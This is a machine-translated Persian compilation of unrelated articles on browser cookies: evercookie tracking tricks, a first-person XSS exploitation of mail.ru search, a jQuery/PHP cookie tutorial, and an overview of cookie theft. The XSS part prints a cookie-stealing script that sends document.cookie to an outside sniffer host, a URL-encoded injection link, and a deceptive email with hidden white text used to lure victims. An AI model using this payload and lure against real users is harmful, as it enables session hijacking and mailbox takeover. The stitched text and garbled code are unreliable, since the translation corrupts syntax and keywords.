کوکی ها فناوری هستند که به وب سایت اجازه می دهد تا یک کاربر را "به خاطر بسپارد".
تنظیمات او را ذخیره کنید و هر بار از او لاگین و رمز عبور نخواهید. می توان
فکر کنید اگر کوکی ها را در مرورگر خود حذف کنید، سایت شما را نمی شناسد. اما این یکی
اعتماد به نفس فریبنده است.

شما می توانید تا جایی که دوست دارید نگران ناشناس بودن خود باشید، از یک پروکسی استفاده کنید
و VPN، هدرهای درخواست HTTP را جعل می کنند که سیستم مورد استفاده را نشان می دهد،
نسخه مرورگر، منطقه زمانی و بسیاری از اطلاعات دیگر، اما وب سایت اهمیتی نمی دهد
هنوز راه هایی برای تشخیص این واقعیت وجود دارد که قبلاً آنجا بوده اید. در خیلی
در مواردی که این امر به ویژه بحرانی نیست، اما نه در شرایطی که در برخی موارد
شما باید خود را به عنوان کاربر دیگری معرفی کنید یا به سادگی ذخیره کنید
ناشناس بودن تصور اینکه چگونه سیستم ضد کلاهبرداری از نوعی متعارف است، آسان است
سازمان مالی، اگر تشخیص دهد که تراکنش ها از یک کامپیوتر انجام شده است
مجوز تحت حساب افراد کاملاً متفاوت. و خوب نیست؟
آیا متوجه شده اید که شخصی در اینترنت می تواند حرکات شما را ردیابی کند؟ به ندرت. ولی
اول چیزهای مهم.

از کوکی ها برای قرن ها برای شناسایی کاربران استفاده می شود.
کوکی ها (از انگلیسی "cookies") یک قطعه کوچک از اطلاعات متنی هستند،
که سرور به مرورگر ارسال می کند. زمانی که کاربر به سرور دسترسی پیدا می کند
(آدرس خود را در خط مرورگر تایپ می کند)، سرور می تواند اطلاعات را بخواند،
موجود در کوکی ها، و بر اساس تجزیه و تحلیل آن، انجام هر گونه اقدام.
به عنوان مثال، در مورد دسترسی مجاز به چیزی از طریق وب در کوکی ها
لاگین و رمز عبور در طول جلسه ذخیره می شوند که به کاربر اجازه نمی دهد
وقتی برای هر سند محافظت شده با رمز عبور از شما خواسته شد دوباره آنها را وارد کنید. بنابراین
به این ترتیب وب سایت می تواند کاربر را "به یاد بیاورد". از نظر فنی به نظر می رسد
به روش زیر. هنگام درخواست یک صفحه، مرورگر یک کوتاه ارسال می کند
متن درخواست HTTP.

به عنوان مثال، برای دسترسی به صفحه www.example.org/index.html مرورگر
درخواست زیر را به سرور www.example.org ارسال می کند:

دریافت /index.html HTTP/1.1
میزبان: www.example.org

سرور با ارسال صفحه درخواستی همراه با متن پاسخ می دهد.
حاوی پاسخ HTTP این ممکن است به مرورگر دستور دهد کوکی ها را ذخیره کند:

HTTP/1.1 200 OK
نوع محتوا: متن/html
Set-Cookie: name=value

اگر خط Set-cookie وجود داشته باشد، مرورگر خط name=value (name = را به خاطر می آورد
مقدار) و با هر درخواست بعدی آن را به سرور ارسال می کند:

دریافت /spec.html HTTP/1.1
میزبان: www.example.org
کوکی: نام = ارزش
تایید کنید: */*

همه چیز بسیار ساده است. اگر سرور کوکی ها را از کلاینت دریافت کرده باشد و آنها را وارد کند
پایگاه داده، او قطعا می تواند آنها را پردازش کند. بنابراین، اگر آن کوکی با
کاربر در زمان بازدید اطلاعاتی در مورد مجوز نخواهد داشت
ورود و رمز عبور از شما خواسته می شود. طبق استاندارد، کوکی ها طول عمر مشخصی دارند
(حتی اگر می تواند بسیار بزرگ باشد)، پس از آن می میرند. و هر
کاربر می تواند به راحتی کوکی های ذخیره شده را با استفاده از آن حذف کند
گزینه مربوطه که در هر مرورگری موجود است. این واقعیت بسیار است
باعث ناراحتی صاحبان بسیاری از منابع می شود که نمی خواهند ارتباط خود را با آنها از دست بدهند
بازدید کننده. برای آنها مهم است که او را ردیابی کنند، بفهمند که "این شخص با ما بود
دیروز و پریروز و غیره." این به ویژه برای تحلیلگرهای مختلف صادق است
ترافیک، سیستم های نگهداری آمار، شبکه های بنر و غیره. اینجاست که
سرگرمی شروع می شود، زیرا توسعه دهندگان از همه نوع استفاده می کنند
ترفندهایی که بسیاری از کاربران حتی از آن بی خبرند. آنها در حال حرکت هستند
ترفندهای مختلف

نکته این است که علاوه بر "خوبی های" معمول HTTP، که همه مدتهاست به آنها علاقه مند هستند
به آن عادت کردم، اکنون از ذخیره سازی های جایگزین به طور فعال استفاده می شود، جایی که مرورگر
می تواند داده ها را در سمت مشتری بنویسد. اولین چیزی که باید ذکر شود این است
ذخیره سازی چیزی که دوست دارید و از آن متنفر هستید همزمان فلش (برای آن دسته از کاربرانی که
که نصب شده است). داده ها در اصطلاح LSO (Local Shared) ذخیره می شوند
اشیاء) - فایل هایی شبیه به کوکی هایی که به صورت محلی در آنها ذخیره می شوند
کامپیوتر کاربر این رویکرد از بسیاری جهات شبیه به "خوبی" های معمولی است (در این
در مورد، مقدار کمی نیز در رایانه کاربر ذخیره می شود.
داده های متنی)، اما دارای مزایایی است:

• کوکی های فلش برای همه مرورگرهای رایانه مشترک هستند (برخلاف
  از کوکی کلاسیک، که به مرورگر گره خورده است). تنظیمات، اطلاعات
  در مورد جلسه، مثلاً یک شناسه برای ردیابی کاربر،
  به هیچ مرورگر خاصی گره نمی خورند، اما برای آن رایج می شوند
  هر کس.
• کوکی های فلش به شما امکان می دهند داده های بسیار بیشتری را ذخیره کنید (مانند
  معمولاً 100 کیلوبایت)، که تعداد تنظیمات کاربر را افزایش می دهد،
  برای صرفه جویی در دسترس است

در عمل، LSO به یک فناوری ردیابی بسیار ساده و مقرون به صرفه تبدیل می شود
کاربر. در مورد آن فکر کنید: اگر من به شما پیشنهاد دادم که همه "خوبی ها" را حذف کنید
سیستم، آیا کوکی های فلش را به خاطر دارید؟ احتمالا نه. حالا سعی کن بگیری
هر بیننده ای مثلا رایگان

FlashCookies مشاهده کنید و ببینید چقدر چیزهای جالب در آن ثبت شده است
مخازن فلش لیستی از سایت هایی که واقعاً نمی خواهند
ردیابی خود را از دست بدهید، حتی اگر کش مرورگر خود را پاک کنید (همراه با چیزهای خوب).

اما اگر کاربران پیشرفته و حتی کاربران کم و بیش خوب در مورد LSO شنیده باشند
توسعه دهندگان، سپس وجود سایر تکنیک های ذخیره سازی داده ها، گاهی اوقات بسیار
پیچیده (اما موثر)، بسیاری حتی مشکوک نیستند. حداقل موارد جدید را بردارید
مخازن که در
(ذخیره سازی جلسه،
Local Storage، Global Storage، Database Storage از طریق SQLite)، که در مورد آنها می توانید
در مقاله "" بخوانید. یک متخصص لهستانی با این مشکل به طور جدی گیج شده بود
در مورد ایمنی سامی کامکار. در نتیجه، ویژه
کتابخانه جاوا اسکریپت Evercookie که به طور خاص برای
بادوام ترین کوکی ها را در مرورگر ایجاد کنید. ممکن است کسی بپرسد: «چرا
آیا این لازم است؟" بسیار ساده: به منظور شناسایی منحصر به فرد
بازدید کننده صفحه اگر دوباره بیاید. چنین کوکی هایی که کشتن آنها دشوار است، اغلب هستند
کوکی های ردیابی نامیده می شوند و حتی توسط برخی آنتی ویروس ها به عنوان شناسایی می شوند
تهدید به حریم خصوصی Evercookie می‌تواند تمام تلاش‌ها برای ناشناس ماندن را کاهش دهد
صفر

راز این است که evercookie از همه چیزهایی که در دسترس مرورگر است به یکباره استفاده می کند
ذخیره سازی: کوکی های HTTP معمولی، LSO، کانتینرهای HTML5. علاوه بر این، وارد بازی می شود
چندین ترفند حیله گر که با موفقیت کمتری به شما امکان می دهد آن را ترک کنید
کامپیوتر علامت مورد نظر از جمله: تولید تصاویر PNG ویژه،
با استفاده از مرورگر تاریخچه، ذخیره داده ها با استفاده از برچسب ETag، ظرف
userData در اینترنت اکسپلورر - معلوم می شود که گزینه های زیادی وجود دارد.

در وب سایت می توانید ببینید که چقدر این کار موثر است.
توسعه دهنده -
http://samy.pl/evercookie. اگر روی «برای ایجاد یک کلیک کنید
evercookie"، کوکی هایی با یک عدد تصادفی در مرورگر ایجاد می شود. آن را امتحان کنید
کوکی ها را تا جایی که ممکن است حذف کنید. الان شرط میبندم تو
فکر کردم: "کجای دیگری می توانم کوکی ها را حذف کنم، جز در تنظیمات مرورگر؟"
مطمئنی همه چی رو پاک کردی؟ صفحه را دوباره بارگذاری کنید تا مطمئن شوید، حتی می توانید دوباره این کار را انجام دهید
مرورگر را باز کنید اکنون با خیال راحت بر روی دکمه "برای کشف مجدد کوکی ها کلیک کنید" کلیک کنید.
WTF؟ این باعث نشد که سایت از جایی - در فیلدهای صفحه - اطلاعات بگیرد
شماره ای که در کوکی ها ذخیره شده بود نمایش داده شد. اما آیا ما آنها را مالیدیم؟ چگونه
کار کرد؟ بیایید سعی کنیم چند تکنیک را درک کنیم.

یک تکنیک بسیار جالب که در Evercookie استفاده می شود، رویکرد است
ذخیره داده ها در تصاویر ذخیره شده PNG. وقتی evercookie آماده می شود
کوکی‌ها، به اسکریپت evercookie_png.php با یک «bun» خاص HTTP دسترسی پیدا می‌کند.
متفاوت از آنچه برای ذخیره اطلاعات استاندارد در مورد استفاده می شود
جلسات این کوکی های ویژه توسط یک اسکریپت PHP که ایجاد می کند خوانده می شود
یک تصویر PNG که در آن تمام مقادیر RGB (رنگی) بر اساس آن تنظیم شده است
با اطلاعات مربوط به جلسه در نهایت فایل PNG به مرورگر مشتری ارسال می شود
با توجه به: "فایل باید به مدت 20 سال کش باشد."

با دریافت این داده ها، evercookie ویژه ایجاد شده قبلی را حذف می کند
کوکی های HTTP، سپس همان درخواست را به همان اسکریپت PHP می دهد، اما نه
ارائه اطلاعات در مورد کاربر او می بیند که داده هایی که به آنها علاقه دارد
نه، و نمی تواند PNG تولید کند. در عوض، مرورگر برمی گردد
پاسخ جعلی HTTP "304 Not Modified" که باعث می شود فایل را از آن خارج کند
حافظه پنهان محلی تصویر از حافظه نهان با استفاده از تگ به صفحه وارد می شود
بوم HTML5. هنگامی که این اتفاق می افتد، evercookie هر پیکسل را می خواند
محتوای بوم، استخراج مقادیر RGB و در نتیجه بازیابی
داده های کوکی اصلی که در تصویر ذخیره شده است. وویلا، همین
آثار.

تکنیک دیگر به طور مستقیم از تاریخچه مرورگر استفاده می کند. یک بار مرورگر
bun را نصب می کند، evercookie داده ها را با استفاده از الگوریتم Base64 رمزگذاری می کند،
که باید حفظ شوند. بیایید فرض کنیم که این داده یک رشته است،
"bcde" حاصل پس از تبدیل به Base64. کتابخانه به صورت متوالی
به URL های زیر در پس زمینه دسترسی پیدا می کند:

google.com/evercookie/cache/b
google.com/evercookie/cache/bc
google.com/evercookie/cache/bcd
google.com/evercookie/cache/bcde
google.com/evercookie/cache/bcde-

بنابراین این URL ها در تاریخچه ذخیره می شوند. بعد یک ویژه می آید
تکنیک - CSS History Knocker که با استفاده از اسکریپت JS و CSS اجازه می دهد
بررسی کنید که آیا کاربر از منبع مشخص شده بازدید کرده است یا خیر (جزئیات بیشتر در اینجا -
samy.pl/csshack). برای
بررسی های evercookie bun از طریق تمام کاراکترهای ممکن Base64 انجام می شود
google.com/evercookie/cache، با کاراکتر "a" شروع می شود و ادامه می یابد، اما فقط
برای یک شخصیت هنگامی که اسکریپت URL مورد نظر را مشاهده کرد، آن را مشاهده می کند
شروع به جستجو برای شخصیت بعدی می کند. معلوم می شود که این یک نوع نیروی بی رحم است. در عمل
این انتخاب بسیار سریع انجام می شود، زیرا هیچ درخواستی وجود ندارد
سرور اجرا نمی شود جستجو در تاریخ تا حد امکان به صورت محلی انجام می شود
کوتاه مدت. کتابخانه می داند که وقتی URL است به انتهای خط رسیده است
با علامت "-" خاتمه دهید. ما Base64 را رمزگشایی می کنیم و داده های خود را دریافت می کنیم. چگونه
توسعه دهندگان مرورگر را نام ببرید که این اجازه را می دهند؟

اگر کاربر کوکی های خود را بمالد چه اتفاقی می افتد؟ یکی از ویژگی های مهم خود کتابخانه
evercookie این است که کاربر باید سخت تلاش کند
کوکی های باقی مانده در مکان های مختلف را حذف کنید - اکنون 10 مورد از آنها وجود دارد. اگر حداقل در یکی باشد
اگر داده های کوکی در جای خود باقی بماند، به طور خودکار در سایر اطلاعات بازیابی می شود
مکان ها به عنوان مثال، اگر کاربر نه تنها کوکی های استاندارد خود را حذف کند، بلکه
و داده‌های LSO را پاک کنید، فضای ذخیره‌سازی HTML5 را پاکسازی کنید، که به هر حال از قبل بعید است
کوکی های ایجاد شده با استفاده از PNG ذخیره شده و تاریخچه وب باقی خواهند ماند. در
دفعه بعد که از سایتی با evercookie بازدید می کنید، کتابخانه نه تنها می تواند آن را پیدا کند
مستی پنهان است، اما آنها را در تمام مکان های دیگر بازیابی می کند
از مرورگر مشتری پشتیبانی می کند. یک نکته جالب مربوط به انتقال است
"خوبی" بین مرورگرها. اگر کاربر کوکی ها را در یک مرورگر دریافت کند،
یعنی احتمال تکثیر آنها در دیگران زیاد است. تنها چیزی
شرط لازم برای این کار، ذخیره داده ها در یک کوکی Local Shared Object است.

کتابخانه Evercookie کاملاً باز است، بنابراین شما می توانید آزادانه
از آن استفاده کنید و آن را مطابق با نیاز خود سفارشی کنید. سرور با هیچ کدام ارائه نمی شود
الزامات جدی تنها چیزی که نیاز دارید دسترسی به یک اسکریپت JS است که در آن
حاوی کد evercookie است. برای استفاده از کوکی های فلش (شئی مشترک محلی)،
باید یک فایل evercookie.swf در پوشه حاوی اسکریپت وجود داشته باشد و تکنسین کار کند،
بر اساس ذخیره PNG و استفاده از ذخیره سازی ETag، دسترسی به
اسکریپت های پی اچ پی evercookie_png.php و evercookie_etag.php. از evercookie استفاده کنید
با اتصال اسکریپت زیر می توانید این کار را در هر صفحه از سایت انجام دهید:

var ec = new evercookie();
// تنظیم کوکی "id" با مقدار "12345"
// نحو: ec.set (کلید، مقدار)
ec.set("id", "12345");
// بازیابی کوکی با نام "id"
ec.get("id"، function(value)
{
alert("مقدار کوکی" + مقدار است)
});

همچنین راه دیگری برای به دست آوردن کوکی ها وجود دارد که بر اساس استفاده بیشتر است
عملکرد برگشت به تماس پیشرفته این به شما امکان می دهد مقادیر کوکی را از آن استخراج کنید
ذخیره سازی های مختلف مورد استفاده و مقایسه آنها با یکدیگر:

تابع getCookie (best_candidate، all_candidates)
{
alert("کوکی بازیابی شده: " + best_candidate + "\n" + "شما
می‌تواند ببیند که هر مکانیزم ذخیره‌سازی چه چیزی را " + "با حلقه زدن در همه، باز می‌گرداند
کاندیداها اعتراض دارند.")

برای (var item in all_candidates) document.write("Storage
مکانیسم " + مورد + " برگردانده شد: " + all_candidates + "
");
}

ec.get("id"، getCookie);

کتابخانه evercookie در دسترس همه است. کمی ترسناک است، به خصوص اگر
شما مطلقاً نمی دانید چه کاری می توانید در برابر او انجام دهید.

پاک کردن کوکی ها در مرورگر و فلش مشکلی ندارد اما سعی کنید
هر کجا که کوکی باقی مانده است، داده ها را حذف کنید! پس از همه، اگر کوکی ها را در یکی بگذارید
مکان - اسکریپت به طور خودکار مقدار سایر موارد را بازیابی می کند
انبارها اساساً این کتابخانه یک بررسی کننده حالت خوب است
حریم خصوصی، که تقریباً همه مرورگرها اکنون از آن برخوردار هستند. و این چیزی است که من به شما می گویم
من می گویم: از Google Chrome، Opera، Internet Explorer و Safari، فقط آخرین مورد
حالت "مرور خصوصی" تمام روش های استفاده شده را کاملا مسدود کرد
همیشه کوکی یعنی بعد از بستن و باز کردن مرورگر، اسکریپت نتوانست
مقدار باقی مانده را بازیابی کنید. دلیلی برای فکر کردن وجود دارد. علاوه بر این، در
در آینده نزدیک، توسعه دهنده evercookie قول داده است که موارد بیشتری را به کتابخانه اضافه کند
چندین تکنیک ذخیره سازی داده، از جمله استفاده از فناوری Isolated
ذخیره سازی در Silverlight و همچنین یک اپلت جاوا.

که در آن پیشنهاد شد در یک رویداد رایگان به مسائل امنیت اطلاعات شرکت کنید. از آنجایی که این رویداد در شهر من برگزار شد، تصمیم گرفتم که حتماً باید به آنجا بروم. اولین درس به آسیب پذیری های وب سایت هایی مانند XSS اختصاص داشت. پس از درس، به این نتیجه رسیدم که باید دانش کسب شده را در شرایط واقعی تثبیت کنم. من چندین سایت را انتخاب کردم که مربوط به شهر من است و شروع به تلاش برای درج فیلمنامه خود در همه اشکال کردم. در بیشتر موارد فیلمنامه فیلتر شد. اما این اتفاق افتاد که "هشدار" فعال شد و پیام من ظاهر شد. من آسیب پذیری پیدا شده را به مدیران گزارش کردم و آنها به سرعت همه چیز را برطرف کردند.

در یکی از همین روزها، هنگام بررسی آخرین ایمیل در mail.ru، فرمی برای جستجوی حروف در صندوق پستی نظرم را جلب کرد. گهگاه از این جستجو برای یافتن چیزی که در انبوهی از نامه های قدیمی ام نیاز داشتم استفاده می کردم. خوب، از آنجایی که در چند روز گذشته تقریباً در هر جایی که می توانستم «هشدار» خود را وارد کرده ام، دستم به طور انعکاسی به سمت این فرم جستجو دراز کرد. کد اسکریپم را تایپ کردم و Enter را فشار دادم. تعجبم را تصور کنید وقتی پیامی دردناک آشنا را روی صفحه دیدم...

در سخنرانی Open InfoSec Days، سخنران گفت که برنامه نویسان در مورد آسیب پذیری هایی از این نوع کاملاً شک دارند و می گویند "هشدار؟ خب پس چی؟ این خطرناک نیست». اگر در سایت های دیگر فقط به این پنجره با پیام خود راضی بودم، در این صورت تصمیم گرفتم جلوتر بروم و نشان دهم که چه چیزی از چنین "هشدار" بیرون می آید.

بنابراین، اسکریپت کار می کند، به این معنی که یک آسیب پذیری وجود دارد. بنابراین، می توانید اسکریپت دیگری را اجرا کنید. به عنوان مثال، اسکریپتی که کوکی های کاربر دیگری را برای ما ارسال می کند. برای اینکه اسکریپت کار کند، باید کاربر را مجبور کنیم تا اسکریپت ما را اجرا کند. این کار را می توان با ارسال نامه ای با لینک مناسب برای او انجام داد و پس از کلیک بر روی آن صندوق پستی جستجو می شود و کد مورد نیاز ما اجرا می شود.

برای درک مکانیک آسیب پذیری کمی زمان و آزمایش زیادی طول کشید. گاهی فیلمنامه کار می کرد، گاهی فیلتر می شد. پس از مدتی تلاش، به طور تجربی مشخص شد که فیلمنامه 100٪ فقط در صورتی کار می کند که جستجوی حروف نتیجه مثبتی داشته باشد. یعنی وقتی کاربر با اسکریپت ما جستجو می کند، لازم است حداقل یک حرف در صندوق پستی او با توجه به پارامترهای داده شده پیدا شود. ترتیب دادن این کار سخت نیست.

همچنین، به جای "هشدار"، ما به یک اسکریپت نیاز داریم که کوکی ها را به sniffer ما منتقل کند. ما این اسکریپت را در یک فایل جداگانه می نویسیم و آن را در جستجوی خود بارگذاری می کنیم. یک فایل test.js با کدهای لازم ساختم و در هاست آپلود کردم. کد اسکریپت به این صورت است:

Img=تصویر جدید();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
تابع F() (
location="http://www.solife.ru";
}
setTimeout (F, 5000)؛

آنچه می خواهم در اینجا روشن کنم. بیایید خودمان را جای مهاجم بگذاریم. ما نیاز داریم که کاربر روی لینک کلیک کند. چگونه می توانم او را مجبور به این کار کنم؟ شما می توانید قول کوه های طلا را بدهید و برای دریافت آنها باید لینک ما را به سایت دنبال کنید. اما من فکر نمی کنم کار کند. مردم دیگر گرفتار این نمی شوند (من خودم دائماً چنین نامه هایی را بدون خواندن آنها حذف می کنم). بنابراین، ما با ترحم انسان بازی خواهیم کرد، زیرا هنوز در طبیعت وجود دارد. از شما می خواهیم برای نجات حیوانات در حال انقراض در سایت رای دهید. ابتدا کوکی ها را می گیریم و سپس کاربر را به سایت رای گیری هدایت می کنیم. زمان برای تغییر مسیر روی 5 ثانیه تنظیم شد، در غیر این صورت کوکی ها به سادگی زمان انتقال به sniffer را نداشتند و کاربر بلافاصله به سایتی درباره حیوانات هدایت شد. به جای "هشدار" از اسکریپت زیر استفاده کردم:

وقتی کار فیلمنامه تمام شد، شروع به نوشتن نامه کردم. من به چیزی شبیه این رسیدم:


کاملا بدبینانه به نظر رسید، اما من سعی کردم شرایط را تا حد امکان به واقعیت نزدیک کنم. در انتهای نامه یک خط با یک خط وجود دارد، این برای این است که وقتی جستجو می کنیم نامه ما پیدا شود. برای اینکه خط سؤالات غیر ضروری ایجاد نکند، آن را سفید کردم. در کلمه http هم یک فاصله گذاشتم تا رشته شناسایی نشود و به لینک تبدیل نشود. در غیر این صورت، با وجود اینکه خط اسکریپت با فونت سفید نوشته شده است، لینک توسط گیرنده با رنگ آبی برجسته می شود و ما به این نیاز نداریم. جستجوی هوشمند همچنان این رشته را با وجود فاصله ها پیدا و تشخیص می دهد.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

من از کدگذاری URL برای اسکریپت استفاده کردم تا هیچ چیز فیلتر نشود. من همچنین پارامتر "q_folder=0" را برای جستجو اضافه کردم تا جستجو در پوشه "Inbox" انجام شود.

نامه آماده است، ما آن را ارسال می کنیم. من از صندوق پست دوم خود در همان سرویس گیرنده استفاده کردم. بیایید ببینیم چه چیزی به جعبه دیگر رسید.

متن اسکریپت ما قابل مشاهده نیست زیرا در پس زمینه ترکیب می شود. بیایید روی لینک کلیک کنیم و ببینیم چه اتفاقی می افتد. کاربر بر اساس پارامتری که ما مشخص کردیم به نتایج جستجوی ایمیل ها منتقل می شود. نامه ما که ارسال کردیم در نتایج جستجو قابل مشاهده است. در این زمان، اسکریپت ما قبلاً کار کرده است و کوکی‌های کاربر را به Sniffer ارسال کرده است. پس از 5 ثانیه (زمان به تنظیمات اسکریپت بستگی دارد)، کاربر به سایت رای گیری هدایت می شود.

فایل sniff.txt خود را بررسی می کنم:

از آنجایی که هدف من سرقت جعبه های دیگران یا دسترسی به آنها نیست، داستان را در اینجا به پایان می برم. اما از نظر تئوری، می‌توانید کوکی‌های خود را با کوکی‌های شخص دیگری جایگزین کنید و به صندوق پستی شخص دیگری دسترسی پیدا کنید. به طور کلی، اگر یک مهاجم به یک هدف علاقه مند باشد، برای اطلاعات دریافتی کاربرد پیدا می کند.

من می خواهم از سرگئی بلوف تشکر کنم (

احتمالاً ارزش این را دارد که از اینکه کوکی ها چیست و برای چه چیزی لازم هستند شروع کنیم. کوکی قطعه ای از داده است که می تواند در سمت کاربر ذخیره شود و بعداً برای اجرای ایده های او استفاده شود.

بیایید تصور کنیم که در وب سایت خود این امکان را دارید که طرح رنگی سایت را انتخاب کنید. پیاده سازی این روی کوکی ها بسیار راحت است، زیرا موضوعی که او انتخاب می کند فقط برای او قابل مشاهده است.

کوکی ها در PHP و jQuery وجود دارند. بنابراین، ما هر مورد را با جزئیات بیشتری بررسی خواهیم کرد.

1. تنظیم کوکی ها

اکنون می توانیم سعی کنیم اولین کوکی خود را ایجاد کنیم:

$.cookie("cookie_name"، "cookie_value"، ( منقضی می شود: 3، مسیر: "/"، دامنه: "your_site.ru"، امن: درست ));

اینجا چیه؟

"cookie_name" - نام کوکی؛

"cookie_value" - مقدار کوکی؛

"انقضا" - تعداد روزهایی که کوکی ها ذخیره می شوند (در مورد ما - 3 روز). پس از این زمان، کوکی ها به طور خودکار حذف می شوند.

"مسیر" - در دسترس بودن کوکی ها در سایت (در مورد ما "/" - موجود در کل سایت). در صورت تمایل، می‌توانید فقط یک صفحه یا بخش خاصی را که کوکی‌ها در آن در دسترس هستند، برای مثال "/audio/rock" مشخص کنید.

"دامنه" - دامنه ای که کوکی در آن معتبر است. اگر یک زیر دامنه دارید، می توانید آن را در این پارامتر مشخص کنید، به عنوان مثال، "دامنه: "subdomain.your_site.ru"، و در این مورد کوکی فقط در دامنه "subdomain.your_site.ru" در دسترس خواهد بود.

" امن" - پارامتری که نشان می دهد کوکی باید از طریق پروتکل امن https منتقل شود.

در اینجا، همه پارامترها مورد نیاز نیستند و برای تنظیم کوکی ها، این ساختار کافی خواهد بود:

$.cookie("cookie_name", "cookie_value"، ( انقضا: 3، مسیر: "/" ));

2. دریافت یک کوکی

دریافت کوکی ها بسیار ساده است، می توانید این کار را با استفاده از کد زیر انجام دهید:

$.cookie("cookie_name");

این کد را می توان به یک متغیر اختصاص داد و برای نیازهای شما استفاده کرد:

var content = $.cookie("نام_کوکی"); if(content != null) ( هشدار ("کوکی وجود دارد!")؛ ) else ( هشدار ("کوکی وجود ندارد!")؛ )

موافقم، این بسیار راحت است.

3. حذف کوکی ها

برای حذف یک مقدار کوکی، آن را روی "null" تنظیم کنید:

$.cookie("cookie_name", null);

فکر می کنم این پایان مقدمه کار با کوکی ها در جی کوئری باشد. این دانش برای اجرای ایده های شما کاملاً کافی است.

برخلاف گزینه قبلی برای کار با کوکی ها، نیازی به اتصال چیزی در اینجا ندارید.

1. تنظیم کوکی ها

به منظور تنظیم کوکی ها در PHP، از تابع "setcookie" داخلی استفاده می کنیم:

اینجا چیه؟

"cookie_name" - نام کوکی؛

"cookie_value" - مقدار کوکی؛

"time()+3600" - طول عمر کوکی در ثانیه (در مورد ما - 1 ساعت). اگر طول عمر را روی "0" تنظیم کنید، کوکی به محض بسته شدن مرورگر حذف می شود.

"/" - بخشی که کوکی ها در آن موجود است (در مورد ما، در سراسر سایت موجود است). اگر می‌خواهید قسمتی را که کوکی‌ها در آن در دسترس هستند محدود کنید، برای مثال، «/» را با «/audio/rock» جایگزین کنید.

"your_site.ru" - دامنه ای که کوکی در آن در دسترس خواهد بود.

"true" - پارامتری که نشان می دهد کوکی فقط از طریق پروتکل امن https در دسترس است. در غیر این صورت مقدار نادرست است.

"false" - پارامتری که نشان می دهد کوکی برای زبان های اسکریپت در دسترس است. در غیر این صورت - درست (فقط از طریق http در دسترس است).

در اینجا نیز همه پارامترها مورد نیاز نیستند و برای ایجاد کوکی ها فقط به ساختار زیر نیاز دارید:

برای راحتی، مقدار کوکی را می توان از طریق یک متغیر تنظیم کرد:

2. دریافت یک کوکی

برای دریافت کوکی ها باید از موارد زیر استفاده کنید:

$_COOKIE["cookie_name"];

برای از بین بردن خطاهای ناشی از کوکی های گم شده، از موارد زیر استفاده کنید:

مانند مثال قبلی کار با کوکی ها در جی کوئری، کوکی ها را می توان به یک متغیر اختصاص داد:

3. حذف کوکی ها

حذف کوکی ها در PHP به همان سادگی در jQuery است. تنها کاری که باید انجام دهید این است که کوکی را روی یک مقدار خالی و یک زمان منفی (زمانی که قبلاً گذشته است) تنظیم کنید:

Setcookie("cookie_name", ""، time() - 3600);

زمان در این مثال یک ساعت پیش است که برای حذف کوکی ها کاملاً کافی است.

من می خواهم توجه داشته باشم که در برخی موارد استفاده از کوکی ها بسیار منطقی تر از استفاده از پایگاه داده برای اجرای عملکردهای لازم است.

بیسکویت ها- اطلاعات در قالب یک فایل متنی که توسط وب سایت در رایانه کاربر ذخیره شده است. حاوی داده های احراز هویت (ورود به سیستم/رمز عبور، شناسه، شماره تلفن، آدرس صندوق پست)، تنظیمات کاربر، وضعیت دسترسی. در نمایه مرورگر ذخیره می شود.

هک کوکیدزدی (یا "ربایش") جلسه بازدیدکنندگان منبع وب است. اطلاعات خصوصی نه تنها برای فرستنده و گیرنده، بلکه برای شخص ثالث - شخصی که رهگیری را انجام داده است، در دسترس قرار می گیرد.

سارقان رایانه، مانند همکاران خود در زندگی واقعی، علاوه بر مهارت، مهارت و دانش، البته، ابزارهای خاص خود را نیز دارند - نوعی زرادخانه از کلیدها و پروب های اصلی. بیایید نگاهی به محبوب ترین ترفندهایی که هکرها برای استخراج کوکی ها از کاربران اینترنت استفاده می کنند بیندازیم.

برنامه های ویژه برای نظارت و تجزیه و تحلیل ترافیک شبکه. نام آنها از فعل انگلیسی "sniff" (sniff) گرفته شده است، زیرا. بسته های ارسالی بین گره ها به معنای واقعی کلمه "بوی کردن" است.

اما مهاجمان از یک sniffer برای رهگیری داده‌های جلسه، پیام‌ها و سایر اطلاعات محرمانه استفاده می‌کنند. اهداف حملات آنها عمدتاً شبکه های محافظت نشده هستند، جایی که کوکی ها در یک جلسه HTTP باز ارسال می شوند، یعنی عملاً رمزگذاری نمی شوند. (وای فای عمومی در این زمینه آسیب پذیرترین است.)

برای جاسازی یک sniffer در کانال اینترنت بین گره کاربر و وب سرور، از روش های زیر استفاده می شود:

• "گوش دادن" به رابط های شبکه (هاب ها، سوئیچ ها)؛
• انشعاب و کپی ترافیک؛
• اتصال به شکاف کانال شبکه؛
• تجزیه و تحلیل از طریق حملات ویژه ای که ترافیک قربانی را به sniffer هدایت می کند (MAC-spoofing، IP-spoofing).

مخفف XSS مخفف Cross Site Scripting است. برای حمله به وب سایت ها به منظور سرقت اطلاعات کاربران استفاده می شود.

اصل XSS به شرح زیر است:

• یک مهاجم کد مخرب (یک اسکریپت پنهان خاص) را در صفحه وب یک وب سایت، انجمن یا در یک پیام (مثلاً هنگام مکاتبه در یک شبکه اجتماعی) وارد می کند.
• قربانی به صفحه آلوده می رود و کد نصب شده را روی رایانه شخصی خود فعال می کند (کلیک می کند، پیوند را دنبال می کند و غیره).
• به نوبه خود، کد مخرب اجرا شده داده های محرمانه کاربر را از مرورگر (به ویژه کوکی ها) "استخراج" می کند و آن را به وب سرور مهاجم ارسال می کند.

هکرها برای «کاشتن» مکانیزم نرم‌افزاری XSS از انواع آسیب‌پذیری‌ها در سرورهای وب، سرویس‌های آنلاین و مرورگرها استفاده می‌کنند.

تمام آسیب پذیری های XSS به دو نوع تقسیم می شوند:

• منفعل.حمله با درخواست یک اسکریپت خاص در یک صفحه وب به دست می آید. کدهای مخرب را می توان به اشکال مختلف در یک صفحه وب (مثلاً در نوار جستجوی یک سایت) تزریق کرد. مستعدترین نسبت به XSS غیرفعال منابعی هستند که تگ های HTML را هنگام رسیدن داده ها فیلتر نمی کنند.
• فعال.مستقیماً روی سرور قرار دارد. و در مرورگر قربانی فعال می شوند. آنها به طور فعال توسط کلاهبرداران در انواع وبلاگ ها، چت ها و فیدهای خبری استفاده می شوند.

